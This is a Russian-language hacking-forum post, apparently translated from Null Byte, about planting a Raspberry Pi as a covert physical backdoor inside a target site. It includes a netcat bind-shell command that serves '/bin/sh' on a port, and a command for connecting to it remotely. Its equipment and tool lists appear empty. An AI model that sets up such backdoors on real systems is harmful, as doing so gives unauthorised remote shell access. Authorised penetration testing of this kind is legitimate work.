Raspberry Pi - Физический бэкдор, часть 1

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Sergei webware, 21 фев 2016.

1. Sergei webware

Симпатии:
    54
    Данное руководство посвящено одной из техник использования вашего Pi. Небольшой размер делает это устройство идеальным для случаев, когда вам требуется проникнуть на объект. В то же время Raspberry Pi обладает возможностями среднего компьютера. Надеюсь, данное руководство поможет вам раскрыть весь потенциал Raspberry Pi и позволит применить свои навыки на практике. Я планирую сделать из него мини-серию в рамках цикла статей о Raspberry Pi. Итак, давайте загрузим нашу Pi.

Лаборатория злого гения

Я не могу не подчеркнуть, как важно быть готовым к любым препятствиям, возникающим на пути. Посему ваш арсенал должен состоять из:
    Конечно, в данный список можно ещё много чего внести, но эти пункты, по моему мнению, имеют решающее значение.

Ncat

Таким образом, ncat остаётся одним из самых эффективных способов подключения к вашему Pi. Но, перед организацией подключения, вам нужно убедиться, что ncat установлен как на самом Pi, так и на компьютере, с которого будет производиться удалённое управление. Полагаю, вы уже установили его на обе системы, так что приступим к подключению. Введите:
    Код (Text):
    nc -l -p(порт) -e /bin/sh
    Если эта команда выполнится успешно, вы сможете подключиться к Pi со своей Kali Linux… или другой системы, который вы пользуетесь. Суть в том, что вы исполняете простую команду:
    Код (Text):
    nc (IP-адрес) (порт)
    Если всё прошло удачно, примите мои поздравления. Теперь вы можете навести шороху. Вот некоторые из инструментов, которые могут для этого пригодиться:
    Почти все такие инструменты поддерживают Kali Linux. Главное понять, чего вы хотите достичь и не забывать про творческий подход.

Заключение

Теперь, когда у нас есть доступ к Pi, пришла пора заняться взломом. Я не стану рассказывать о каждом из многочисленных инструментов, но ваши возможности практически безграничны. В ближайшем будущем, я планирую написать несколько руководств по взлому с помощью Pi и различных инструментов. Но сейчас я занят работой над несколькими проектами, так что, пожалуйста, запаситесь терпением. Как обычно, жду ваших комментариев и предложений.

Источник http://null-byte.wonderhowto.com/how-to/raspberry-pi-physical-backdoor-part-1-0167625/

Загрузка...

Поделиться этой страницей